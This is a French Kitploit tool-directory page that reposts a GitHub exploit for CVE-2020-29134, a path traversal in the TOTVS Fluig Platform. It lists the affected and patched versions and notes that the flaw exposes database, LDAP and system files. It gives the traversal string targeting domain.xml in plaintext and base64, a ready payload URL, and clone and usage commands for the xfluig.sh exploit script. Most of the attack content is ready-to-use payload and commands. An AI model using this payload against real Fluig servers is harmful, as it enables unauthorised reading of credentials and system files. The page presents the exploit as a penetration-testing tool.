Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-29134 — Exploit CVE-2020-29134 - TOTVS Fluig Platform - Path Traversal | Kitploit
Outils/GitHubGitHub/ls4ss/cve-2020-29134
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubls4ss/cve-2020-29134

CVE-2020-29134

Exploit CVE-2020-29134 - TOTVS Fluig Platform - Path Traversal

Voir le dépôt
3114il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Totvs Fluig Platform

 Fluig est la plateforme de productivité et de collaboration qui s'intègre au système ERP,
 et aux autres systèmes de votre entreprise pour révolutionner la façon dont vous et votre équipe travaillez.

CVE-2020-29134

 La plateforme TOTVS Fluig permet un path traversal via un paramètre encodé en base64.
 Lorsqu'elle est exploitée, cette vulnérabilité permet la lecture de fichiers XML sensibles, qui contiennent
 des données pour accéder à la base de données et, dans certains cas, aux connexions LDAP et aux intégrations du système ERP.
 De plus, il est également possible d'explorer des fichiers système, tels que /etc/passwd et /root/.bash_history
 

Versions concernées

--
<== Fluig Lake 1.7.0
<== Fluig 1.6.5
<== Fluig 1.6.4
...

Versions corrigées

<== Fluig Lake 1.7.0-210303 (Patched)
<== Fluig 1.6.5-210308 (Patched)
<== Fluig 1.6.4-210308 (Patched)

Construction du payload

alt text

Vecteur d'attaque

 http://fluig.host.com/volume/stream/Rmx1aWc=/

Traversée de chemin en texte clair

 ?t=1&vol=Default&id=1&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml

Traversée de chemin encodée en base64

 P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=

Payload

 http://HOST.FLUIG.COM/volume/stream/Rmx1aWc=/P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
 

Référence Exploit-DB

 https://www.exploit-db.com/exploits/49622

 

Cloner le dépôt

 # git clone https://github.com/lucxssouza/CVE-2020-29134.git
 # cd CVE-2020-29134
 # chmod +x xfluig.sh

Utilisation

 Ex1: ./xfluig.sh http://fluig.host.com REQUESTS_WFUZZ (number of requests generated by wfuzz)

 Ex2: ./xfluig.sh http://fluig.host.com:PORT
Télécharger l’outil